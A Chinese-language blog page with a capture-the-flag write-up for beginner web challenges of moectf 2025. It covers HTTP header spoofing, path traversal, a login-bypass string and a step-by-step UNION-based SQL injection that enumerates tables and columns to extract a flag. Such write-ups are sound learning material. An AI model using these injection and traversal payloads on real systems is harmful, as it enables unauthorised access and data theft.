<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/Ak_char_007_closre_3.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/Ak_char_007_closre_3.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/Ak_char_007_closre_3.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="T1-万言启封咒考察一个f12“元素”标签的使用，更改输入框内文字为txt内容即可 T2-初识金曦玄轨考察bp等抓包，从模糊文字可知要访问&#x2F;golden_trail页面，在响应头中即可看到flag T3-问剑石！篡天改命！宗门弟子改命，查看源代码可知是用一个POST请求上传level，并用js上传manifest，各自改好POST上去即可 T4-金曦破禁与七绝傀儡阵 磐石傀儡：get">
<meta property="og:type" content="article">
<meta property="og:title" content="moectf 2025-web write-up">
<meta property="og:url" content="http://example.com/2026/09/05/web/index.html">
<meta property="og:site_name" content="aClosure&#39;s奇妙的妙妙据点">
<meta property="og:description" content="T1-万言启封咒考察一个f12“元素”标签的使用，更改输入框内文字为txt内容即可 T2-初识金曦玄轨考察bp等抓包，从模糊文字可知要访问&#x2F;golden_trail页面，在响应头中即可看到flag T3-问剑石！篡天改命！宗门弟子改命，查看源代码可知是用一个POST请求上传level，并用js上传manifest，各自改好POST上去即可 T4-金曦破禁与七绝傀儡阵 磐石傀儡：get">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-09-05T14:54:07.000Z">
<meta property="article:modified_time" content="2026-09-05T14:59:45.010Z">
<meta property="article:author" content="aClosure">
<meta property="article:tag" content="omakase">
<meta property="article:tag" content="dev">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2026/09/05/web/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>moectf 2025-web write-up | aClosure's奇妙的妙妙据点</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">aClosure's奇妙的妙妙据点</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-fw fa-calendar"></i>日程表</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-fw fa-sitemap"></i>站点地图</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/09/05/web/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="aClosure">
      <meta itemprop="description" content="おす～！">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="aClosure's奇妙的妙妙据点">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          moectf 2025-web write-up
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2026-09-05 22:54:07 / 修改时间：22:59:45" itemprop="dateCreated datePublished" datetime="2026-09-05T22:54:07+08:00">2026-09-05</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%88%86%E7%B1%BB/" itemprop="url" rel="index"><span itemprop="name">分类</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <span id="more"></span>

<h2 id="T1-万言启封咒"><a href="#T1-万言启封咒" class="headerlink" title="T1-万言启封咒"></a>T1-万言启封咒</h2><p>考察一个f12“元素”标签的使用，更改输入框内文字为txt内容即可</p>
<h2 id="T2-初识金曦玄轨"><a href="#T2-初识金曦玄轨" class="headerlink" title="T2-初识金曦玄轨"></a>T2-初识金曦玄轨</h2><p>考察bp等抓包，从模糊文字可知要访问&#x2F;golden_trail页面，在响应头中即可看到flag</p>
<h2 id="T3-问剑石！篡天改命！"><a href="#T3-问剑石！篡天改命！" class="headerlink" title="T3-问剑石！篡天改命！"></a>T3-问剑石！篡天改命！</h2><p>宗门弟子改命，查看源代码可知是用一个POST请求上传level，并用js上传manifest，各自改好POST上去即可</p>
<h2 id="T4-金曦破禁与七绝傀儡阵"><a href="#T4-金曦破禁与七绝傀儡阵" class="headerlink" title="T4-金曦破禁与七绝傀儡阵"></a>T4-金曦破禁与七绝傀儡阵</h2><ol>
<li><p>磐石傀儡：get方法传参即可，直接?key&#x3D;xdsec</p>
</li>
<li><p>织云傀儡:   post方法传参即可，注意不要直接复制（手打一下织云阁&#x3D;第一</p>
</li>
<li><p>溯源傀儡：本地访问，更改XFF（X-Forwarded-For）为127.0.0.1即可</p>
</li>
<li><p>器灵傀儡：使用“moe browser”访问，更改useragent即可</p>
</li>
<li><p>心印傀儡：“以xt的身份认证user”，注意<strong>认证</strong>这两个字的含金量，所以加上cookie:user&#x3D;xt</p>
</li>
<li><p>前尘傀儡：”从<a target="_blank" rel="noopener" href="http://panshi/entry%E6%9D%A5%E2%80%9C%EF%BC%8C%E6%9B%B4%E6%94%B9Referer%E5%8D%B3%E5%8F%AF">http://panshi/entry来“，更改Referer即可</a></p>
</li>
<li><p>逆转傀儡：PUT一个”新生！“上去即可（别忘了<strong>感叹号</strong>，并且更改Content-Type）<br><u>PUT &#x2F;rebirth HTTP&#x2F;1.1 Host: 逆转傀儡 Content-Type: text&#x2F;plain 新生！</u><br><u>关键：使用PUT方法；简单设置Content-Type；在Body中传递一个象征”新生”的信息</u></p>
</li>
</ol>
<h2 id="T5-打上门来！"><a href="#T5-打上门来！" class="headerlink" title="T5-打上门来！"></a>T5-打上门来！</h2><p>别给首页那个破阵的文件骗了……那个是T4的，第一次做顺序放反了，被坑了好久（泣）</p>
<p>..&#x2F;..&#x2F;穿越回主目录下即可发现flag</p>
<h2 id="T6-藏经禁制？玄机初探！"><a href="#T6-藏经禁制？玄机初探！" class="headerlink" title="T6-藏经禁制？玄机初探！"></a>T6-藏经禁制？玄机初探！</h2><p>mysql绕过登录</p>
<p>用户名字段大概是:</p>
<p>SELECT * FROM users WHERE username&#x3D;’$username’ AND password&#x3D;’$password’;（变量记得加$，md打不出来）</p>
<p>所以用户名输入admin’ or 1 &#x3D; 1 # 以注释掉密码，之后密码字段随便填就好</p>
<h2 id="T7-灵蛛探穴与阴阳双生符"><a href="#T7-灵蛛探穴与阴阳双生符" class="headerlink" title="T7-灵蛛探穴与阴阳双生符"></a>T7-灵蛛探穴与阴阳双生符</h2><p>”告知搜索引擎<strong>爬虫</strong>哪些页面可以抓取“，想到robots.txt，访问，发现”Disallow: &#x2F;flag.php“</p>
<p>访问后发现要求a!&#x3D;b,且md5值”相等“，想到md5碰撞，网上搜两个传参就好（传参直接跟?就好，不用&#x2F;）</p>
<h2 id="T8-天衍真言，星图显圣"><a href="#T8-天衍真言，星图显圣" class="headerlink" title="T8-天衍真言，星图显圣"></a>T8-天衍真言，星图显圣</h2><p>根据提示，可知考察sql注入，首先尝试admin’ or 1 &#x3D; 1#，给出回显“Welcome admin”，并未登录</p>
<p>输入预期错误admin’ and 1&#x3D;2#，显示登陆错误，实锤是sql注入</p>
<p>admin’ order by 3#起报错，说明就user和pwd两列</p>
<p>-1’ union select 1111,2222#，回显1111，说明pwd的字段是黑盒（注意，<strong>不要再用admin</strong>！！！admin存在就会一直报welcomeadmin，啥也拿不到）</p>
<p>爆库名：-1’ union select database(),2222# ，发现在user库</p>
<p>爆表名：-1’ union select table_name,2222 from information_schema.tables where table_schema &#x3D; database() #，回显welcome flag</p>
<p>注意：“爆表名”时，where跟的是table_<strong>schema</strong>，且值写database，不要具体写user（待补充</p>
<p>爆列名：-1’ union select column_name,2222 from information_schema.columns where table_schema &#x3D; database() <u>and table_name &#x3D;</u> <strong>‘flag’</strong> #，得到回显welcome value</p>
<p>注意：flag要加双引号（泣），上面的原因也是这个</p>
<p>爆字段：-1’ union select value,2 from flag #，得到flag</p>
<h2 id="T9-星墟禁制·天机问路"><a href="#T9-星墟禁制·天机问路" class="headerlink" title="T9-星墟禁制·天机问路"></a>T9-星墟禁制·天机问路</h2><p>看网上wp，说是个SSRF漏洞，明天继续更（）</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/omakase/" rel="tag"># omakase</a>
              <a href="/tags/dev/" rel="tag"># dev</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/08/12/%E4%BB%8E%E9%9B%B6%EF%BC%88%EF%BC%9F%EF%BC%89%E5%BC%80%E5%A7%8B%E7%9A%84blog%E6%90%AD%E5%BB%BA/" rel="prev" title="从零开始（？）的blog搭建">
      <i class="fa fa-chevron-left"></i> 从零开始（？）的blog搭建
    </a></div>
      <div class="post-nav-item"></div>
    </div>
</footer>

<div class="giscus-comments">
  <script src="https://giscus.app/client.js"
          data-repo="aClosure/aClosure.github.io"
          data-repo-id="R_kgDOT1T-4w"
          data-category="Polls"
          data-category-id="DIC_kwDOT1T-484DDMyT"
          data-mapping="pathname"
          data-strict="0"
          data-reactions-enabled="1"
          data-emit-metadata="0"
          data-input-position="top"
          data-theme="preferred_color_scheme"
          data-lang="zh-CN"
          data-loading="lazy"
          crossorigin="anonymous"
          async>
  </script>
</div>

</article>






          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#T1-%E4%B8%87%E8%A8%80%E5%90%AF%E5%B0%81%E5%92%92"><span class="nav-number">1.</span> <span class="nav-text">T1-万言启封咒</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#T2-%E5%88%9D%E8%AF%86%E9%87%91%E6%9B%A6%E7%8E%84%E8%BD%A8"><span class="nav-number">2.</span> <span class="nav-text">T2-初识金曦玄轨</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#T3-%E9%97%AE%E5%89%91%E7%9F%B3%EF%BC%81%E7%AF%A1%E5%A4%A9%E6%94%B9%E5%91%BD%EF%BC%81"><span class="nav-number">3.</span> <span class="nav-text">T3-问剑石！篡天改命！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#T4-%E9%87%91%E6%9B%A6%E7%A0%B4%E7%A6%81%E4%B8%8E%E4%B8%83%E7%BB%9D%E5%82%80%E5%84%A1%E9%98%B5"><span class="nav-number">4.</span> <span class="nav-text">T4-金曦破禁与七绝傀儡阵</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#T5-%E6%89%93%E4%B8%8A%E9%97%A8%E6%9D%A5%EF%BC%81"><span class="nav-number">5.</span> <span class="nav-text">T5-打上门来！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#T6-%E8%97%8F%E7%BB%8F%E7%A6%81%E5%88%B6%EF%BC%9F%E7%8E%84%E6%9C%BA%E5%88%9D%E6%8E%A2%EF%BC%81"><span class="nav-number">6.</span> <span class="nav-text">T6-藏经禁制？玄机初探！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#T7-%E7%81%B5%E8%9B%9B%E6%8E%A2%E7%A9%B4%E4%B8%8E%E9%98%B4%E9%98%B3%E5%8F%8C%E7%94%9F%E7%AC%A6"><span class="nav-number">7.</span> <span class="nav-text">T7-灵蛛探穴与阴阳双生符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#T8-%E5%A4%A9%E8%A1%8D%E7%9C%9F%E8%A8%80%EF%BC%8C%E6%98%9F%E5%9B%BE%E6%98%BE%E5%9C%A3"><span class="nav-number">8.</span> <span class="nav-text">T8-天衍真言，星图显圣</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#T9-%E6%98%9F%E5%A2%9F%E7%A6%81%E5%88%B6%C2%B7%E5%A4%A9%E6%9C%BA%E9%97%AE%E8%B7%AF"><span class="nav-number">9.</span> <span class="nav-text">T9-星墟禁制·天机问路</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="aClosure"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">aClosure</p>
  <div class="site-description" itemprop="description">おす～！</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/aClosure/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;aClosure&#x2F;" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/3131474973" title="QQ → 3131474973"><i class="fa fa-fw fa-qq"></i>QQ</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:aClosure@bupt.edu.cn" title="E-Mail → mailto:aClosure@bupt.edu.cn" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">aClosure</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
